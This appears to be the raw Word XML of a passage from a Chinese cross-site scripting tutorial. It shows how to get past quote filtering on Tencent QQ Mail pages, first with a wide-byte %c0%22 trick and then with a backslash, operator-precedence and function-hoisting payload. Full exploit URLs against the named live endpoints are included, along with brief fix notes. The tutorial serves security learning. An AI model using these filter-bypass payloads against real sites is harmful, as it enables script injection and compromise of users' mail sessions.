          <w:p w:rsidR="00991883" w:rsidRPr="009C207F" w:rsidRDefault="0099188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li&gt;&lt;divclass="yebg"&gt;&lt;ahref="javascript:location='http://stock.finance.qq.com/report/search.php?offset='+document.getElementById('pagenum').value+'&amp;searchtype_yjbg=yjjg&amp;searchvalue_yjbg=aaaaaaaaaa'"&gt;GO&lt;/a&gt;&lt;/div&gt;&lt;/li&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00932DF1" w:rsidRPr="009C207F" w:rsidRDefault="0001093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8.</w:t>
      </w:r>
      <w:r w:rsidR="00932DF1" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0028158C" w:rsidRPr="009C207F" w:rsidRDefault="00932DF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对于输出在HTML属性中的情况，需要特殊情况特殊对待，该过滤\的时候，请过滤\,该过滤&amp;的情况，则过滤掉</w:t>
      </w:r>
      <w:r w:rsidR="0028158C" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00932DF1" w:rsidRPr="009C207F" w:rsidRDefault="00932DF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碰到有某些修复的人用正则去判断，&amp;#xNNN..</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,而实际上</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&amp;#x0NN;&amp;#x00NN,（后面自己慢慢试。。）都是可以的。或者是&amp;#10进制;以及一些特殊的HTML实体，如&amp;quot;等，都要注意到，好麻烦，最好的办法，还是&amp;过滤为&amp;amp;：）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001131C4" w:rsidRPr="009C207F" w:rsidRDefault="00507804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89531A" w:rsidRPr="009A6E70" w:rsidRDefault="0089531A" w:rsidP="009A6E70">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="009A6E70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第四节宽字节复仇记</w:t>
      </w:r>
      <w:r w:rsidRPr="009A6E70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>[QQ</w:t>
      </w:r>
      <w:r w:rsidRPr="009A6E70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>邮箱基本通用</w:t>
      </w:r>
      <w:r w:rsidRPr="009A6E70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0089531A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89531A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89531A" w:rsidRPr="009C207F" w:rsidRDefault="0089531A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89531A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89531A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前面教程第2节，说到了输出在&lt;script&gt;.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/script&gt;之间的情况。也说到了后面会再继续一些有意思的例子。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0089531A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实际上，我们碰到的往往不是那么好。很多情况下，程序员都是会过滤的。那么我们怎么办呢？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0089531A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“因地制宜，因材施教。”根据漏洞的实际情况，我们可以各种绕过。不知道这里乱用成语没啊。惶恐不安中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0089531A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里先看看第一种方法，宽字节绕过。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0089531A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9D2FD3" w:rsidRPr="009C207F" w:rsidRDefault="009D2FD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89531A" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>有一个比较经典的SQL注入，是宽字节注入。玩渗透的可能对这个都比较清楚2.有时候，宽字节确实可以带来奇效～～下面我们</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0089531A" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>看腾讯</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0089531A" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的一个例子。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0089531A" w:rsidRPr="009C207F" w:rsidRDefault="009D2FD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2.</w:t>
      </w:r>
      <w:r w:rsidR="0089531A" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>例子如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0089531A" w:rsidRPr="009C207F" w:rsidRDefault="0089531A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tp://open.mail.qq.com/cgi-bin/qm_help_mailme?sid=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,2,zh</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>_CN&amp;t=%22;alert(1);//aaaaaa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D2FD3" w:rsidRPr="009C207F" w:rsidRDefault="009D2FD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3.</w:t>
      </w:r>
      <w:r w:rsidR="0089531A" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>我们尝试注入"来闭合前面的双引号，但是</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0089531A" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>很</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0089531A" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>悲剧的是，双引号被过滤了。。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D2FD3" w:rsidRPr="009C207F" w:rsidRDefault="009D2FD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我们看图：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E060FE" w:rsidRPr="009C207F" w:rsidRDefault="00DE496D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4A34ACF" wp14:editId="5779AE4E">
            <wp:extent cx="5524500" cy="2143125"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="3" name="图片 3" descr="14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1A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E496D" w:rsidRPr="009C207F" w:rsidRDefault="009D2FD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4.</w:t>
      </w:r>
      <w:r w:rsidR="0089531A" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>看到这种情况，一般人估计会放弃了吧，至少说明程序员注意到了这里，并且过滤了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE496D" w:rsidRPr="009C207F" w:rsidRDefault="00DE496D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然后我们可</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>以看到的代码是：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00436F75" w:rsidRPr="009C207F" w:rsidRDefault="0089531A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&lt;metahttp-equiv="Content-Type"content="text/html</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;charset</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=gb18030"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0089531A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gbxxxx系列的编码，那么我们尝试一下宽字节呢？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0089531A" w:rsidRPr="009C207F" w:rsidRDefault="0089531A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tp://open.mail.qq.com/cgi-bin/qm_help_mailme?sid=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,2,zh</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>_CN&amp;t=%c0%22;alert(1);//aaaaaa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0089531A" w:rsidRPr="009C207F" w:rsidRDefault="009D2FD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5.</w:t>
      </w:r>
      <w:r w:rsidR="0089531A" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>看看效果：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E060FE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220CEA2" wp14:editId="6FA4170F">
            <wp:extent cx="5715000" cy="2295525"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="14" name="图片 14" descr="15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1A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4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89531A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lastRenderedPageBreak/>
        <w:t>弹个窗</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E060FE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05157E2F" wp14:editId="24967B90">
            <wp:extent cx="5715000" cy="2581275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="15" name="图片 15" descr="16.jp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.jp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1A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5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E496D" w:rsidRPr="009C207F" w:rsidRDefault="0089531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利用宽字节，我们华丽的复仇了“腾讯对双引号的屠杀”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0089531A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6.</w:t>
      </w:r>
      <w:r w:rsidR="0089531A" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>至于这个漏洞的成因，和传统的宽字节漏洞并不一样。目测应该是由于过滤双引号的正则表达式写得有问题造成的。并不是因为%22变成了%5c%22,而%c0吃掉了后面的%5c。而后面这种情况，</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0089531A" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>在腾讯的</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0089531A" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>相关站点暂时没有发现实际案例。如果有，欢迎大家分享。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0089531A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7.</w:t>
      </w:r>
      <w:r w:rsidR="0089531A" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0089531A" w:rsidRPr="009C207F" w:rsidRDefault="00414B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修复相关过滤机制</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00775CDF" w:rsidRPr="009C207F" w:rsidRDefault="00775CDF" w:rsidP="00775CD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DE496D" w:rsidRPr="009A6E70" w:rsidRDefault="00DE496D" w:rsidP="009A6E70">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="009A6E70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第五节反斜线复仇记</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE496D" w:rsidRPr="009C207F" w:rsidRDefault="00DE496D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DE496D" w:rsidRPr="009C207F" w:rsidRDefault="00DE496D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DE496D" w:rsidRPr="009C207F" w:rsidRDefault="00DE496D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还是在&lt;script&gt;之间的场景，某些情况下，我们仅仅需要的只是一个反斜线，就可以绕过过滤了。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.</w:t>
      </w:r>
      <w:r w:rsidR="00414B8A" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>有以下实例点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tp://mail.qq.com/cgi-bin/login?vt=passport&amp;ss=aaa&amp;from=bbb&amp;delegate_url=%2Fcgi-bin%2Fframe_html%3Furl%3D%25252Fcgi-bin%25252Fsetting10%25253Faction%25253Dlist%252526t%25253Dsetting10%252526ss%25253Dindex%252526Mtype%25253D1%252526clickpos%25253D20%252526loc%25253Ddelegate%25252Cwebmap%25252C%25252C1</w:t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2.</w:t>
      </w:r>
      <w:r w:rsidR="004E0A33" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对应的输出，如下图所示：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E060FE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C0EF66A" wp14:editId="251015B4">
            <wp:extent cx="5715000" cy="1143000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16" name="图片 16" descr="17.jp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.jp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6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3.</w:t>
      </w:r>
      <w:r w:rsidR="004E0A33" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>经过测试，我们可以看到，双引号是用不了，但是</w:t>
      </w:r>
      <w:r w:rsidR="00414B8A" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>反斜线还可以使用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E060FE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51D6205" wp14:editId="03464C89">
            <wp:extent cx="5715000" cy="2581275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="17" name="图片 17" descr="18.jp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.jp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7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4.</w:t>
      </w:r>
      <w:r w:rsidR="004E0A33" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>那么这里是否可以成功的XSS呢？</w:t>
      </w:r>
      <w:r w:rsidR="00414B8A" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>我们把缺陷代码部分提取出来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&lt;script&gt;getTop().location.href="/cgi-bin/loginpage?autologin=n&amp;errtype=1&amp;verify=&amp;clientuin="+"&amp;t="+"&amp;alias="+"&amp;regalias="+"&amp;delegate_url=%2Fcgi-bin%2Fframe_html%3Furl%3D%252Fcgi-bin%252Fsetting10%253Faction%253Dlist%2526t%253Dsetting10%2526ss%253Dindex%2526Mtype%253D1%2526clickpos%253D20%2526loc%253Ddelegate%252Cwebmap%252C%252C1"+"&amp;title="+"&amp;url=%2Fcgi-bin%2Flogin%3Fvt%3Dpassport%26ss%3Daaa%2522%26from%3Dbbb%5C%26delegate_url%3D%252Fcgi-bin%252Fframe_html%253Furl%253D%2525252Fcgi-bin%2525252Fsetting10%2525253Faction%2525253Dlist%25252526t%2525253Dsetting10%25252526ss%2525253Dindex%25252526Mtype%2525253D1%25252526clickpos%2525253D20%25252526loc%2525253Ddelegate%2525252Cwebmap%2525252C%2525252C1"+"&amp;org_fun="+"&amp;aliastype="+"&amp;ss=aaa"+"&amp;from=bbb"+"&amp;param="+"&amp;sp=6fa57ce5b3047ebMTM1NTQwOTA2Mg"+"&amp;r=3ec785174fff5206ed6f0cf4a8c5e3c5"+"&amp;ppp="+"&amp;secpp="&lt;/script&gt;</w:t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5.</w:t>
      </w:r>
      <w:r w:rsidR="004E0A33" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>可以看到有缺陷的部分是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location.href="........."+"&amp;ss=aaaa"+"&amp;from=bbb"+"&amp;param=";//</w:t>
      </w:r>
      <w:r w:rsidR="00414B8A" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>后面省略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可以控制的是aaaa，又不能用"，怎么办呢？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因为我们可以使用\，那么我们可以杀掉aaaa后面的</w:t>
      </w:r>
      <w:r w:rsidR="00414B8A" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>双引号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location.href="........."+"&amp;ss=aaaa\"+"&amp;from=bbb"+"&amp;param=";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代码的结果因为一个反斜线发生了变化，如下图：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E060FE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AF2DAD8" wp14:editId="11C2575B">
            <wp:extent cx="5715000" cy="742950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18" name="图片 18" descr="19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8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6.</w:t>
      </w:r>
      <w:r w:rsidR="004E0A33" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>为了保证bbb后面的语法正确性，我们把bbb改为一个数字，把bbb后面加上//</w:t>
      </w:r>
      <w:r w:rsidR="00ED164C" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>来注释掉后面的部分。变成以下形式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location.href="........."+"&amp;ss=aaaa\"+"&amp;from=1//"+"&amp;param=";</w:t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7.</w:t>
      </w:r>
      <w:r w:rsidR="004E0A33" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>看起来不错哦，但是会出来一些问题，"字符串"&amp;from=1，这样是错误的，因为&amp;符号的优先级高，("字符串"&amp;from)=1是无法进行这种赋值操作的。这样一来还是不行。别着急</w:t>
      </w:r>
      <w:r w:rsidR="00ED164C" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。我们可以稍微改动一下。变为以下形式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location.href="........."+"&amp;ss=aaaa\"+"&amp;from==1//"+"&amp;param=";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由于==的优先级比&amp;高，所以语句相当于("字符串")&amp;(from==1)</w:t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8.</w:t>
      </w:r>
      <w:r w:rsidR="004E0A33" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>更顺眼了，但是还是会悲剧啊。由于from未定义，直接和1进行相等判断的话，会报错，错误是：“from”未定义。。。怎么办呢？</w:t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9.</w:t>
      </w:r>
      <w:r w:rsidR="004E0A33" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>别紧张，javascript里有一个特性。如下：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aaa(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>);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functionaaa(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>){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}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凡是以functionxxx(){}形式定义的函数，都会被最优先解析。换句话说：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解析器</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>在解析JS代码段时，会先将functionxxx(){}拿到最前面解析，然后再依次解析其它的部分。换句话说，上面的代码，实际的解析顺序是：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functionaaa(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>){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}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aaa(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>);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利用这样一个特性，我们的代码可以改改。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location.href="........."+"&amp;ss=aaaa\"+"&amp;from==1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;functionfrom</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(){}//"+"&amp;param=";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样一来，我们的functionfrom(){}就会被提前解析，从而定义了from,后面from==1的时候，就不会报错啦～～</w:t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0.</w:t>
      </w:r>
      <w:r w:rsidR="00ED164C" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>故事往往是曲折的，到了这一步，我们会发现还是不行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看一看源代码吧～～，哎，我们的空格被转义为了&amp;nbsp;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E060FE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679E0217" wp14:editId="33C329DD">
            <wp:extent cx="5715000" cy="2133600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="19" name="图片 19" descr="20.jp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.jp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9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lastRenderedPageBreak/>
        <w:t>11.</w:t>
      </w:r>
      <w:r w:rsidR="004E0A33" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当然，这么一点小事情，难不到我们的，我们用注释符来做分隔符。/**/替换空格，有没有觉得和sql</w:t>
      </w:r>
      <w:r w:rsidR="00ED164C" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>注入一样了，咔咔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于是，我们的代码变为了：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location.href="........."+"&amp;ss=aaaa\"+"&amp;from==1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;function</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/**/from(){}//"+"&amp;param=";</w:t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2.</w:t>
      </w:r>
      <w:r w:rsidR="004E0A33" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>嗯，这次没有语法错误了，我们插入我们自己的JS代码。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location.href="........."+"&amp;ss=aaaa\"+"&amp;from==1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;alert</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(1);function/**/from(){}//"+"&amp;param=";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最终的利用代码如下：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tp://mail.qq.com/cgi-bin/login?vt=passport&amp;ss=\&amp;from==0;alert(1);function/**/from(){};//&amp;delegate_url=%2Fcgi-bin%2Fframe_html%3Furl%3D%25252Fcgi-bin%25252Fsetting10%25253Faction%25253Dlist%252526t%25253Dsetting10%252526ss%25253Dindex%252526Mtype%25253D1%252526clickpos%25253D20%252526loc%25253Ddelegate%25252Cwebmap%25252C%25252C1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恩，这次是我们的反斜线为双引号报仇啦！</w:t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3.</w:t>
      </w:r>
      <w:r w:rsidR="004E0A33" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E0A33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1)</w:t>
      </w:r>
      <w:r w:rsidR="00ED164C" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>随便修修就好</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE496D" w:rsidRPr="009C207F" w:rsidRDefault="006353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</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
